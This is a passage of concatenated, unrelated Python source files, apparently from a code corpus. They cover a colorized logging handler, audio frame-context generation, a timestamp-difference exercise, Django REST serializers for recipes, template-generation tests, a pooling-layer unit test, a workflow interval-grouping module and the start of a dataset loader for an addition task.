        logging.CRITICAL: ('red', 'white', True),
    }
    # Map logger name to foreground colors
    logger_map = {}
    csi = '\x1b['
    reset = '\x1b[0m'
    is_windows = platform.system() == 'Windows'
    def __init__(self, logger_colors):
        super(ColorizingStreamHandler, self).__init__()
        self.logger_map = logger_colors
    @property
    def is_tty(self):
        """True when the underlying stream is an interactive terminal."""
        isatty = getattr(self.stream, 'isatty', None)
        return isatty and isatty()
    def emit(self, record):
        try:
            message = self.format(record)
            self.stream.write(message)
            self.stream.write(getattr(self, 'terminator', '\n'))
            self.flush()
        except Exception:
            self.handleError(record)
    def format(self, record):
        """Format the record, colorized by logger name or by level."""
        message = logging.StreamHandler.format(self, record)
        if not self.is_tty or self.is_windows:
            return message
        # Consistency fix: use .items() like the rest of this module
        # (.items()/.values() above); .iteritems() is Python 2-only and
        # behaves identically here on Python 2.
        for name, color in self.logger_map.items():
            if record.name.startswith(name):
                return self.colorize(message, fg=color)
        if record.levelno in self.level_map:
            bg, fg, bold = self.level_map[record.levelno]
            return self.colorize(message, bg=bg, fg=fg, bold=bold)
        return message
    def colorize(self, message, bg=None, fg=None, bold=False):
        """Wrap *message* in ANSI SGR codes for the given colors/boldness."""
        params = []
        if bg in COLORS:
            params.append(str(COLORS.index(bg) + 40))
        if fg in COLORS:
            params.append(str(COLORS.index(fg) + 30))
        if bold:
            params.append('1')
        if params:
            message = ''.join((
                self.csi, ';'.join(params), 'm', message, self.reset))
        return message
| StarcoderdataPython |
8074640 | #===========================================================================================================================
# aims : This script takes the frame file in input and gives it back adding the context to each frame
#
# input : input_filepath : folder containing subjects' cepstra. It takes the subject_path set in 1_main_process_subjects.py
#
# output_filepath: folder where it writes back the cepstra with context
# Nframes: number of context frames added to both sides of each single frame. It takes the ctx_frames set in 1_main_process_subjects.py
#
# return : void
#===========================================================================================================================
import os
import re
import numpy as np
from numpy import genfromtxt
from . import utilities
def create_context_file(input_filepath, output_filepath, Nframes):
    """Rewrite a frame file so every row carries +/- ``Nframes`` of context.

    Each output row is the concatenation of the ``Nframes`` previous rows, the
    row itself and the ``Nframes`` following rows (2*Nframes+1 frames total).
    Rows near either end are padded by repeating the first/last row.

    NOTE: like the original, this assumes the file has more than
    2*Nframes + 1 rows.

    :param input_filepath: whitespace-separated frame file to read
    :param output_filepath: path the context-augmented frames are written to
    :param Nframes: number of context frames added on each side of a frame
    """
    # Count physical lines only to locate the last frame index.
    with open(input_filepath, 'rb') as f:
        lines = f.readlines()
    count_lines = len(lines)

    startSent = 0                    # index of the first frame
    endSent = int(count_lines) - 1   # index of the last frame

    data = genfromtxt(input_filepath)
    Newdata = np.zeros([data.shape[0], data.shape[1] * ((2 * Nframes) + 1)])
    indexData1 = startSent
    indexData2 = endSent

    # first frame of the statement: left context is the first row repeated
    Newdata[indexData1, :] = np.concatenate((np.tile(data[indexData1, :], Nframes + 1),
                                             data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
                                                 data.shape[1] * Nframes)))
    indexData1 += 1
    # second frame of the statement
    Newdata[indexData1, :] = np.concatenate((np.tile(data[startSent, :], Nframes), data[indexData1, :],
                                             data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
                                                 data.shape[1] * Nframes)))
    indexData1 += 1
    # from the 3rd frame up to the Nframes-th frame: partial left padding
    while indexData1 < Nframes:
        diff1 = indexData1
        DummyFramesL = np.concatenate((np.tile(data[startSent, :], Nframes - diff1 + 1),
                                       data[indexData1 - diff1 + 1:indexData1, :].reshape(data.shape[1] * (diff1 - 1))))
        Newdata[indexData1, :] = np.concatenate((DummyFramesL, data[indexData1, :],
                                                 data[indexData1 + 1:indexData1 + Nframes + 1, :].reshape(
                                                     data.shape[1] * Nframes)))
        indexData1 += 1
    # central frames: full context available on both sides.
    # BUG FIX: the upper bound was ``indexData2 - Nframes`` (exclusive), which
    # for Nframes >= 2 left row ``endSent - Nframes`` all zeros — neither this
    # loop nor the right-padding code below ever filled it.
    for index in range(indexData1, indexData2 - Nframes + 1):
        Newdata[index, :] = data[max(0, index - Nframes - 1 + 1): index + Nframes + 1, :].reshape(
            data.shape[1] * ((2 * Nframes) + 1))
    # last frame of the statement: right context is the last row repeated
    Newdata[indexData2, :] = np.concatenate((data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes),
                                             np.tile(data[indexData2, :], Nframes + 1)))
    indexData2 -= 1
    # penultimate frame of the statement
    Newdata[indexData2, :] = np.concatenate((data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes),
                                             data[indexData2, :], np.tile(data[indexData2 + 1, :], Nframes)))
    indexData2 -= 1
    # remaining frames near the end: partial right padding
    while endSent - indexData2 < Nframes:
        diff2 = endSent - indexData2
        DummyFramesR = np.concatenate((data[indexData2 + 1:endSent, :].reshape(data.shape[1] * (diff2 - 1)),
                                       np.tile(data[endSent, :], Nframes - diff2 + 1)))
        Newdata[indexData2, :] = np.concatenate(
            (data[indexData2 - Nframes:indexData2, :].reshape(data.shape[1] * Nframes), data[indexData2, :], DummyFramesR))
        indexData2 -= 1

    # Write the result; the context manager closes the handle deterministically
    # (the original leaked both file handles).
    with open(output_filepath, "wb") as ctx_file:
        np.savetxt(ctx_file, Newdata, fmt='%.4f')
def createSubjectContext(subject_path, ctx_frames):
    """Create a ctx_-prefixed context file for every .dat file in *subject_path*."""
    for entry in os.listdir(subject_path):
        # skip non-frame files and already-generated context files
        if not entry.endswith(".dat") or entry.startswith("ctx"):
            continue
        create_context_file(subject_path + "/" + entry,
                            subject_path + "/" + 'ctx_' + entry,
                            ctx_frames)
    print("subject context created")
| StarcoderdataPython |
1766157 | #When users post an update on social media,such as a URL, image, status update etc., other users in their network are able to view this new post on their news feed. Users can also see exactly when the post was published, i.e, how many hours, minutes or seconds ago.
#Since sometimes posts are published and viewed in different time zones, this can be confusing. You are given two timestamps of one such post that a user can see on his newsfeed in the following format:
#Day dd Mon yyyy hh:mm:ss +xxxx
#Here +xxxx represents the time zone. Your task is to print the absolute difference (in seconds) between them.
#Input Format
#The first line contains T, the number of testcases.
#Each testcase contains 2 lines, representing time t1 and t2 time.
#Constraints
#Input contains only valid timestamps
#year <= 3000
#Output Format :
#Print the absolute difference (t1 and t2) in seconds.
#Sample Input 0
#2
#Sun 10 May 2015 13:54:36 -0700
#Sun 10 May 2015 13:54:36 -0000
#Sat 02 May 2015 19:54:36 +0530
#Fri 01 May 2015 13:54:36 -0000
#Sample Output 0
#25200
#88200
#Explanation 0
#In the first query, when we compare the time in UTC for both the time stamps, we see a difference of 7 hours. which is 7 * 3600 seconds or 25200 seconds
#Similarly, in the second query, time difference is 5 hours and 30 minutes for time zone adjusting for that we have a difference of 1 day and 30 minutes. Or 24 * 3600 + 30 * 60 => 88200
from datetime import datetime as dt

# Timezone-aware timestamp format: "Day dd Mon yyyy hh:mm:ss +xxxx"
fmt = '%a %d %b %Y %H:%M:%S %z'
for _ in range(int(input())):
    first = dt.strptime(input(), fmt)
    second = dt.strptime(input(), fmt)
    # %z makes both datetimes timezone-aware, so the subtraction is exact
    print(int(abs((first - second).total_seconds())))
1632246 | from rest_framework import serializers
from .fields import UidRelatedField
from .models import Category, Recipe
from .utils import strip_query_params, make_s3_url_https
# Handy reference for serializers: http://cdrf.co/
class CategorySerializer(serializers.ModelSerializer):
    """Serializer exposing every Category field.

    ``parent_uid`` may arrive as ``null`` from the API; it is normalised to an
    empty string before being stored.
    """

    class Meta:
        model = Category
        fields = '__all__'
        extra_kwargs = {
            # These fields may be null in the API, we transform them to empty strings below
            'parent_uid': {'allow_null': True},
        }

    def validate_parent_uid(self, value):
        if value is None:
            return ''
        return value
class RecipeSerializer(serializers.ModelSerializer):
    """Serializer for Recipe records coming from the Paprika API.

    Nullable API fields are normalised to empty strings for the database, and
    a recipe photo is downloaded to disk after a successful save.
    """

    # Recipes in Paprika API aren't updated to remove missing/deleted categories, so ignore any categories we don't know about
    categories = UidRelatedField(queryset=Category.objects, many=True, ignore_missing_relation=True)

    # API fields that may be null but are stored as '' in the database.
    NULL_TO_EMPTY_STR_FIELDS = {
        'cook_time',
        'description',
        'difficulty',
        'directions',
        'image_url',
        'ingredients',
        'in_trash',
        'is_pinned',
        'notes',
        'nutritional_info',
        'on_grocery_list',
        'photo',
        'photo_hash',
        'photo_large',
        'photo_url',
        'prep_time',
        'scale',
        'servings',
        'source',
        'source_url',
        'total_time',
    }

    class Meta:
        model = Recipe
        exclude = ['id', 'import_stable_hash', 'created_date', 'modified_date', 'date_ended']
        extra_kwargs = {
            'in_trash': {'allow_null': True, 'default': False},
            'paprika_account': {'write_only': True},
        }

    def validate_in_trash(self, value):
        # None is allowed in serializer, but not in database, so convert it to the field's default
        if value is None:
            return Recipe._meta.get_field('in_trash').default
        return value

    def to_internal_value(self, data):
        'Convert null fields to empty string as recommended for django db models'
        for key, value in data.items():
            if key in RecipeSerializer.NULL_TO_EMPTY_STR_FIELDS and value is None:
                data[key] = ''
        return super().to_internal_value(data)

    def save(self, **kwargs):
        instance = super().save(**kwargs)
        # Download photo from signed url to disk
        if instance and instance.photo_url:
            instance.download_photo(use_db_url=True)
        return instance
177226 | """test generate_bes_from_template"""
# pylint: disable=import-error,wildcard-import,undefined-variable,wrong-import-position,unused-wildcard-import,consider-using-f-string
import argparse
import os.path
import sys
# don't create bytecode for tests because it is cluttery in python2
sys.dont_write_bytecode = True
# check for --test_pip arg
parser = argparse.ArgumentParser()
parser.add_argument(
"--test_pip", help="to test package installed with pip", action="store_true"
)
args = parser.parse_args()
if not args.test_pip:
# add module folder to import paths for testing local src
sys.path.append(
os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
)
# reverse the order so we make sure to get the local src module
sys.path.reverse()
from generate_bes_from_template import *
tests_count = 0 # pylint: disable=invalid-name
# print(action_prefetch_from_template.__file__)
# make sure we are testing the right place:
if args.test_pip:
# this will false positive on windows
assert "/src/" not in action_prefetch_from_template.__file__
else:
# check for only 'src' so it will work on windows and non-windows
assert "src" in action_prefetch_from_template.__file__
def test_partials(partials_path="."):
    """Render TemplateExample.mustache with partials loaded from *partials_path*."""
    script_folder = os.path.dirname(os.path.abspath(__file__))
    template_file_path = os.path.join(script_folder, "TemplateExample.mustache")
    return generate_bes_from_template.generate_content_from_template(  # pylint: disable=unexpected-keyword-arg
        {}, template_file_path, partials_path=partials_path
    )
# Module-level smoke tests: each assert pins a generated artifact's expected prefix.
# NOTE(review): indentation inside the triple-quoted literals below was lost in
# extraction and is reproduced flush-left — confirm against the real templates.
# pylint: disable=line-too-long
assert str(action_prefetch_from_template.main()) == (
    "prefetch LGPO.zip sha1:0c74dac83aed569607aaa6df152206c709eef769 size:815660 https://download.microsoft.com/download/8/5/C/85C25433-A1B0-4FFA-9429-7E023E7DA8D8/LGPO.zip sha256:6ffb6416366652993c992280e29faea3507b5b5aa661c33ba1af31f48acea9c4"
)
tests_count += 1

assert str(generate_bes_from_template.main()).startswith(
    """<?xml version="1.0" encoding="UTF-8"?>
<BES xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="BES.xsd">
<Task>
<Title>Example Generated From Template</Title>
<Description><![CDATA[ This Task was generated automatically! ]]></Description>
<Relevance><![CDATA[ Comment: Always False */ FALSE /* This example doesn't do anything, so it is always false. ]]></Relevance>
<Relevance><![CDATA[ TRUE ]]></Relevance>
<Category></Category>
<DownloadSize>9999</DownloadSize>
<Source>Internal</Source>
<SourceID><![CDATA[JGStew]]></SourceID>
"""
)
tests_count += 1

assert str(action_createfile_from_file.main()).startswith(
    """delete __createfile
// --- START of contents of action_createfile_from_file.py ------------
createfile until __END_OF_FILE__
#!/usr/local/python
"""
)
tests_count += 1

if not args.test_pip:
    script_folder_path = os.path.dirname(os.path.abspath(__file__))
    # print(test_partials(script_folder_path))
    assert str(test_partials(script_folder_path)).startswith("Hello, World!")
    tests_count += 1
    assert str(test_partials(script_folder_path)).startswith(
        "Hello, World! You can load partials from a folder!"
    )
    tests_count += 1

# tests pass, return 0:
print("-------------------------------------")
print("Success: %d Tests pass" % tests_count)
print("")
sys.exit(0)
| StarcoderdataPython |
5030092 | <reponame>Stoick01/bluebird
import unittest
import numpy as np
from bluebird.layers import *
from bluebird.nn import NeuralNet
from bluebird.activations import *
class TestMaxPool2D(unittest.TestCase):
    """Shape checks for the bluebird MaxPool2D layer."""

    def test_forward(self):
        """Test forward propagation for MaxPool2D"""
        pool = MaxPool2D(kernel_size=3)
        # input is (batch=5, height=6, width=9, channels=3)
        x = np.random.randn(5, 6, 9, 3)
        a = pool.forward(x)
        # 6x9 spatial dims pooled with a 3x3 kernel -> 2x3; batch/channels preserved
        assert a.shape == (5, 2, 3, 3)

    # def test_weight_grad(self):
    #     """Tests the input grad for MaxPool2D layer"""
    #     layer = MaxPool2D(kernel_size=3)
    #     x = np.random.randn(5, 6, 9, 3)
    #     diff = grad_calc(x, layer)
    #     print(diff)
    #     for key, val in diff.items():
    #         assert val < 1e-7, "Gradient of " + key + " not calculated properly"
3477243 | """Super useful module"""
def print_num(number):
    """Write *number* to standard output, followed by a newline."""
    sys.stdout.write(str(number) + "\n")
| StarcoderdataPython |
1646122 | #!/usr/bin/env python
import csv
import sys
import os, os.path
import numpy as np
from datetime import datetime as dt
from scipy import optimize
from scripts import signals as sig
from scripts import fft_estimator
from scripts import optimizing
from scripts import utility
from scripts import crlb
from scripts import cfg
# Select which simulation part ('a' or 'b') to run from the command line.
try:
    task = sys.argv[1]
except Exception as e:
    print("No input task provided, exiting. \n Usage: python main.py <task>")
    exit(1)

# Sweep parameters: signal-to-noise ratios and FFT-size exponents (M = 2**K).
SNR_dBs =[-10, 0, 10, 20, 30, 40, 50, 60]
FFT_Ks = [10, 12, 14, 16, 18, 20]
n = len(SNR_dBs)
m = len(FFT_Ks)
N = 100 # Amount of samples to generate when estimating variance

# Generate unique filename for data file output
run_number = len([name for name in os.listdir('./data') if os.path.isfile('./data/' + name)])
if task == 'a':
    # Part a: estimate frequency/phase with the raw FFT estimator for every
    # (FFT size K, SNR) pair and compare sample variance with the CRLB.
    filename = 'data/part_a_run_' + str(run_number) + '_N_' + str(N) + '.csv'
    # NOTE(review): 'ab' + csv.writer is the Python 2 convention; on Python 3
    # csv expects a text-mode file — confirm the intended interpreter.
    with open(filename, 'ab') as file:
        writer = csv.writer(file, delimiter=' ')
        total_time_begin = dt.now()
        for i in range(m):
            K = FFT_Ks[i]
            M = 2**K  # FFT length
            for j in range(n):
                SNR_dB = SNR_dBs[j]
                w_estimates = np.zeros(N)
                phi_estimates = np.zeros(N)
                status_bar_progress = 0
                run_time_begin = dt.now()
                # Monte-Carlo loop: N independent noisy realisations.
                for k in range(N):
                    x_d = sig.x_discrete(SNR_dB)
                    omega_hat, phi_hat, _, _ = fft_estimator.estimator(x_d, M)
                    w_estimates[k] = omega_hat
                    phi_estimates[k] = phi_hat
                    status_bar_progress = utility.print_status_bar(k, status_bar_progress, N)
                mean_f = np.mean(w_estimates) / (2*np.pi)
                mean_phi = np.mean(phi_estimates)
                var_f = np.var(w_estimates)
                var_phi = np.var(phi_estimates)
                crlb_f = crlb.omega(SNR_dB)
                crlb_phi = crlb.phi(SNR_dB)
                run_time_end = dt.now()
                print("")
                utility.print_execution_time(run_time_begin, run_time_end)
                # A variance below the CRLB indicates a biased/invalid estimate.
                f_estimate_valid = True
                phi_estimate_valid = True
                if var_f < crlb_f:
                    f_estimate_valid = False
                    print("Variance for frequency lower than CRLB!")
                if var_phi < crlb_phi:
                    phi_estimate_valid = False
                    print("Variance for phi lower than CRLB!")
                writer.writerow([SNR_dB, K, crlb_f, var_f, f_estimate_valid, crlb_phi, var_phi, phi_estimate_valid, mean_f, mean_phi])
                print("CONFIG | SNR [dB]: {}, M: 2^{}, true frequency: {}, true phase: {}".format(SNR_dB, K, cfg.f0, cfg.phi))
                print("FREQUENCY | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_f, var_f, crlb_f))
                print("PHASE | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_phi, var_phi, crlb_phi))
                print("")
        total_time_end = dt.now()
        utility.print_execution_time(total_time_begin, total_time_end)
if task == 'b':
    # Part b: refine the coarse FFT estimates with Nelder-Mead numerical
    # optimisation, using a fixed (small) FFT size M = 2**10.
    filename = 'data/part_b_run_' + str(run_number) + '_N_' + str(N) + '.csv'
    with open(filename, 'ab') as file:
        writer = csv.writer(file, delimiter=' ')
        M = 2**10
        total_time_begin = dt.now()
        for SNR_dB in SNR_dBs:
            w_estimates = np.zeros(N)
            phi_estimates = np.zeros(N)
            status_bar_progress = 0
            run_time_begin = dt.now()
            for i in range(N):
                x_d = sig.x_discrete(SNR_dB)
                # coarse FFT estimate used as the optimiser's starting point
                omega_hat, phi_hat, _, _ = fft_estimator.estimator(x_d, M)
                omega_opt = optimize.minimize(optimizing.frequency_objective_function, omega_hat, method="Nelder-Mead", args=(M, x_d, phi_hat))
                phase_opt = optimize.minimize(optimizing.phase_objective_function, phi_hat, method="Nelder-Mead", args=(x_d, omega_hat))
                w_estimates[i] = omega_opt.x[0]
                phi_estimates[i] = phase_opt.x[0]
                status_bar_progress = utility.print_status_bar(i, status_bar_progress, N)
            run_time_end = dt.now()
            print("")
            utility.print_execution_time(run_time_begin, run_time_end)
            mean_f = np.mean(w_estimates) / (2*np.pi)
            mean_phi = np.mean(phi_estimates)
            var_f = np.var(w_estimates)
            var_phi = np.var(phi_estimates)
            crlb_f = crlb.omega(SNR_dB)
            crlb_phi = crlb.phi(SNR_dB)
            # A variance below the CRLB indicates a biased/invalid estimate.
            f_estimate_valid = True
            phi_estimate_valid = True
            if var_f < crlb_f:
                f_estimate_valid = False
                print("Variance for f lower than CRLB!")
            if var_phi < crlb_phi:
                phi_estimate_valid = False
                print("Variance for phi lower than CRLB!")
            writer.writerow([SNR_dB, 10, crlb_f, var_f, f_estimate_valid, crlb_phi, var_phi, phi_estimate_valid, mean_f, mean_phi])
            print("CONFIG | SNR [dB]: {}, M: 2^{}, true f: {}, true phase: {}".format(SNR_dB, 10, cfg.f0, cfg.phi))
            print("FREQUENCY | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_f, var_f, crlb_f))
            print("PHASE | estimated mean: {}, estimated variance: {}, crlb: {}".format(mean_phi, var_phi, crlb_phi))
            print("")
        total_time_end = dt.now()
        utility.print_execution_time(total_time_begin, total_time_end)
1852549 | # Copyright (c) 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from collections import defaultdict
from functools import total_ordering
import numpy as np
from itertools import chain
from ..workflow.entities.bases import IntervalBase
from ..workflow.entities.threadins import ThreadActivity
from ..workflow.entities.join import JoinActivityBase
from ..workflow.entities.request import ExtendedInterval
def projection_time(from_tos):
    """Return the total length covered by a set of (from, to) intervals.

    Overlapping or touching intervals are merged before summing, so each
    instant is counted once (the "projection" onto the time axis).

    :param from_tos: iterable of (from, to) pairs. FIX: the input is no
        longer sorted in place, so the caller's list is not mutated.
    :return: summed length of the merged intervals (0 for empty input).
    """
    total = 0
    start = None
    end = None
    for from_, to_ in sorted(from_tos):
        if start is None:
            # first interval opens the current merged span
            start = from_
            end = to_
        elif from_ <= end:
            # overlaps/touches the current span: extend it
            end = max(end, to_)
        else:
            # disjoint: close the current span and start a new one
            total += (end-start)
            start = from_
            end = to_
    if start is not None:
        total += (end-start)
    return total
@total_ordering
class IntGroup(object):
    """A group of equivalent intervals (same from-edge, name, to-edge).

    Groups form a DAG via ``_prv_groups``/``_nxt_groups``; ``reduce`` in
    Workflow tentatively links two groups (``links``/``linked``) and keeps
    the merge only if the graph stays acyclic.
    """

    def __init__(self, int_name, from_edgename, to_edgename, weight, desc):
        self.int_name = int_name
        self.from_edgename = from_edgename
        self.to_edgename = to_edgename
        self.vis_weight = weight
        self.desc = desc
        self.intervals = []
        self._nxt_groups = set()
        self._prv_groups = set()
        # pending-merge pointers: self.links -> group being absorbed,
        # group.linked -> absorbing group
        self.links = None
        self.linked = None

    @property
    def path(self):
        # canonical "from[name]to" identifier shared by every interval in the group
        return "%s[%s]%s" % (
            self.from_edgename,
            self.int_name,
            self.to_edgename)

    @property
    def len_ints(self):
        return len(self.intervals)

    @property
    def from_seconds(self):
        if not self.intervals:
            return 0
        return min(c.from_seconds for c in self.intervals)

    @property
    def to_seconds(self):
        if not self.intervals:
            return 0
        return max(c.to_seconds for c in self.intervals)

    @property
    def lapse(self):
        # wall-clock span from earliest start to latest end
        return self.to_seconds - self.from_seconds

    @property
    def cumulated_seconds(self):
        if not self.intervals:
            return 0
        return sum([c.lapse for c in self.intervals])

    @property
    def projection_seconds(self):
        # overlap-merged total time (see projection_time above)
        if not self.intervals:
            return 0
        from_tos = [(c.from_seconds, c.to_seconds) for c in self.intervals]
        return projection_time(from_tos)

    @property
    def is_inlink(self):
        # True while this group participates in a tentative merge
        if self.links or self.linked:
            return True
        else:
            return False

    def __repr__(self):
        return "<IntGroup#%s: %d intervals, %d nxt_groups" % (
            self.path,
            len(self.intervals),
            len(self._nxt_groups))

    # identity-based equality/hash; ordering prefers larger groups
    __eq__ = lambda self, other:\
        id(self) == id(other)
    __lt__ = lambda self, other:\
        len(self.intervals) > len(other.intervals)\
        and id(self) > id(other)
    __hash__ = lambda self:\
        id(self)

    def append_interval(self, interval):
        assert isinstance(interval, IntervalBase)
        assert interval.path == self.path
        self.intervals.append(interval)

    def append_group(self, group):
        """Add *group* as a successor (its from-edge must match our to-edge)."""
        assert isinstance(group, IntGroup)
        assert group.from_edgename == self.to_edgename
        self._nxt_groups.add(group)
        group._prv_groups.add(self)

    def prepare_sort(self):
        """Build _topo_in/_topo_out neighbour sets, resolving pending merges."""
        assert not self.linked
        if self.links:
            # treat the pair (self + self.links) as one node
            prv_groups = chain(self._prv_groups, self.links._prv_groups)
            nxt_groups = chain(self._nxt_groups, self.links._nxt_groups)
        else:
            prv_groups = self._prv_groups
            nxt_groups = self._nxt_groups
        self._topo_in = set()
        for g in prv_groups:
            if g.linked:
                self._topo_in.add(g.linked)
            else:
                self._topo_in.add(g)
        self._topo_out = set()
        for g in nxt_groups:
            if g.linked:
                self._topo_out.add(g.linked)
            else:
                self._topo_out.add(g)

    def try_merge(self, group):
        """Tentatively absorb *group* (same path); confirmed by apply_merge."""
        assert isinstance(group, IntGroup)
        assert not self.is_inlink
        assert not group.is_inlink
        assert self.path == group.path
        self.links = group
        group.linked = self

    def abort_merge(self):
        """Undo a tentative merge started by try_merge."""
        self.links.linked = None
        self.links = None

    def apply_merge(self):
        """Commit the tentative merge: steal intervals and rewire edges."""
        assert self.links
        self.intervals.extend(self.links.intervals)
        for nxt_group in self.links._nxt_groups:
            nxt_group._prv_groups.remove(self.links)
            nxt_group._prv_groups.add(self)
        for prv_group in self.links._prv_groups:
            prv_group._nxt_groups.remove(self.links)
            prv_group._nxt_groups.add(self)
        self._nxt_groups.update(self.links._nxt_groups)
        self._prv_groups.update(self.links._prv_groups)
        self.links = None

    def iter_nxtgroups(self):
        for g in sorted(self._nxt_groups):
            yield g
class Workflow(object):
    """A DAG of IntGroups built from request intervals.

    ``build`` is called once per interval generation; ``reduce`` then greedily
    merges same-path groups while keeping the graph acyclic.
    """

    def __init__(self, name):
        self.name = name
        self.start_group = None
        self.groups = set()
        self.len_intervals = 0
        self.reqs = []
        # for build
        self._group_byreq = {}
        # for reduce
        self.paths = {}

    @property
    def len_reqs(self):
        return len(self.reqs)

    def build(self, intervals):
        """Append one generation of intervals, chaining each request's groups."""
        group_by_fromgroup_toedgename = {}
        newgroup_byreq = {}
        for interval in intervals:
            if interval is None:
                continue
            assert isinstance(interval, IntervalBase)
            assert interval.is_interval
            assert interval.request
            if not self._group_byreq:
                # first generation: everything hangs off the synthetic START group
                if not self.start_group:
                    self.start_group = IntGroup("START",
                                                None,
                                                interval.from_edgename,
                                                None,
                                                "None")
                from_group = self.start_group
            else:
                from_group = self._group_byreq[interval.request]
            group_key = (from_group, interval.to_edgename)
            group = group_by_fromgroup_toedgename.get(group_key)
            if not group:
                # vis_weight source depends on the concrete interval type
                if isinstance(interval, ThreadActivity):
                    weight = interval.state.vis_weight
                elif isinstance(interval, JoinActivityBase):
                    weight = interval.join_obj.vis_weight
                elif isinstance(interval, ExtendedInterval):
                    weight = interval.component.vis_weight
                else:
                    raise RuntimeError("Illegal interval %r" % interval)
                desc = "%s: %s -> %s" % (
                    interval.path,
                    interval.from_keyword,
                    interval.to_keyword)
                group = IntGroup(interval.int_name,
                                 interval.from_edgename,
                                 interval.to_edgename,
                                 weight,
                                 desc)
                from_group.append_group(group)
                group_by_fromgroup_toedgename[group_key] = group
                self.groups.add(group)
                self.paths[group.path] = group.vis_weight
            group.append_interval(interval)
            self.len_intervals += 1
            newgroup_byreq[interval.request] = group
        if not self.reqs:
            self.reqs = newgroup_byreq.keys()
        self._group_byreq = newgroup_byreq

    # NOTE: Depth first
    def sort_topologically(self):
        """Return groups in topological order, or None if the graph has a cycle."""
        ret = []
        self.start_group.prepare_sort()
        for group in self.groups:
            group.prepare_sort()

        def _walk(group):
            for nxt_group in sorted(group._topo_out):
                nxt_group._topo_in.remove(group)
                if not nxt_group._topo_in:
                    ret.append(nxt_group)
                    _walk(nxt_group)
        _walk(self.start_group)
        # a cycle leaves some groups with unconsumed predecessors
        if len(ret) == len(self.groups):
            return ret
        else:
            return None

    def reduce(self):
        """Greedily merge same-path groups, keeping only acyclicity-preserving merges."""
        print("Workflow: built %d groups" % len(self.groups))
        #1 sort states
        path_weights = sorted(self.paths.items(),
                              key=lambda s:s[1],
                              reverse=True)
        for path, _ in path_weights:
            #2 sort groups of the same path
            groups = self.sort_topologically()
            assert groups
            groups = [group for group in groups if group.path == path]
            while groups:
                group = groups[0]
                groups = groups[1:]
                nxt_groups = []
                for to_merge in groups:
                    #3 try merge group pairs
                    group.try_merge(to_merge)
                    self.groups.remove(to_merge)
                    if self.sort_topologically() is not None:
                        group.apply_merge()
                    else:
                        # merge would create a cycle: roll it back
                        group.abort_merge()
                        self.groups.add(to_merge)
                        nxt_groups.append(to_merge)
                groups = nxt_groups
        print("Workflow: reduced to %d groups" % len(self.groups))

    def ready(self):
        """Finalise: assert no pending merges and sort each group's intervals."""
        for group in self.groups:
            assert not group.is_inlink
            group.intervals.sort()

    def __repr__(self):
        return "<Workflow %s: %d groups, %d reqs, %d intervals>" % (
            self.name,
            len(self.groups),
            len(self.reqs),
            self.len_intervals)

    def __str__(self):
        """Tabular per-group timing report (counts, projected/cumulated times)."""
        ret = repr(self)
        lines = []
        attrs = []
        for group in self.sort_topologically():
            assert isinstance(group, IntGroup)
            lines.append(group.path)
            len_ints = group.len_ints
            proj = group.projection_seconds
            added = group.cumulated_seconds
            lapse = group.lapse
            # `len_ints and ...` guards against division by zero for empty groups
            avg = len_ints and added/len_ints
            ratio = len_ints and proj/len_ints
            attrs.append((len_ints, proj, added, lapse, avg, ratio, group.desc))
        len_line = max(len(l) for l in lines)
        ret += "\n"+" "*len_line + "| cnt,"+\
               "project_s,cumulat_s, lapse_s, avg_MS, ratio_MS"
        format_str = "\n%-" + str(len_line) + "s|" + "%6s,"\
                     + "%9.5f,"*5 + " %s"
        for line, (len_ints, proj, added, lapse, avg, ratio, desc)\
                in zip(lines, attrs):
            ret += format_str % (
                line, len_ints, proj, added, lapse, avg*1000, ratio*1000, desc)
        return ret
| StarcoderdataPython |
# coding=utf-8

if __name__ == "__main__":
    # Placeholder entry point; the module is still under development.
    print("developing...")
1845 | <filename>egg/zoo/addition/data.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Iterable, Optional, Tuple
import torch
from torch.utils.data import DataLoader
class ScaledDataset:
    """Dataset wrapper that virtually repeats its examples ``scaling_factor`` times.

    Indexing wraps around modulo the real example count, so no data is copied.
    """

    def __init__(self, examples, scaling_factor=1):
        self.examples = examples
        self.scaling_factor = scaling_factor

    def __len__(self):
        return self.scaling_factor * len(self.examples)

    def __getitem__(self, k):
        # wrap the virtual index back onto the underlying examples
        return self.examples[k % len(self.examples)]
def get_dataloaders(opts) -> Tuple[Iterable[
    Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
], Iterable[
    Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
]]:
    "Returning an iterator for tuple(sender_input, labels, receiver_input)."
    # Enumerate every addition example, then split train/holdout randomly.
    full_data = enumerate_dataset(opts.input_size)
    len_train = int(opts.training_density * len(full_data))
    train_set, holdout_set = torch.utils.data.random_split(full_data,
                                                           [len_train, len(full_data) - len_train]
                                                           )
    # validation uses the (unscaled) training examples
    validation_set = train_set
    # scale the training set so each epoch sees the examples data_scaler times
    train_set = ScaledDataset(train_set, opts.data_scaler)

    train_loader, validation_loader, holdout_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True), \
        DataLoader(validation_set, batch_size=len(validation_set)), \
        DataLoader(holdout_set, batch_size=opts.batch_size)

    return train_loader, validation_loader, holdout_loader
def enumerate_dataset(input_size):
    """Enumerate every addition example over [0, input_size).

    Each example is a pair (features, target): features concatenates two
    one-hot vectors of length ``input_size`` selecting the addends i and j;
    target is a one-hot vector of length ``2*input_size - 1`` marking i + j.
    """
    pairs = []
    for i in range(input_size):
        for j in range(input_size):
            features = torch.zeros(2 * input_size)
            features[i] = 1.0
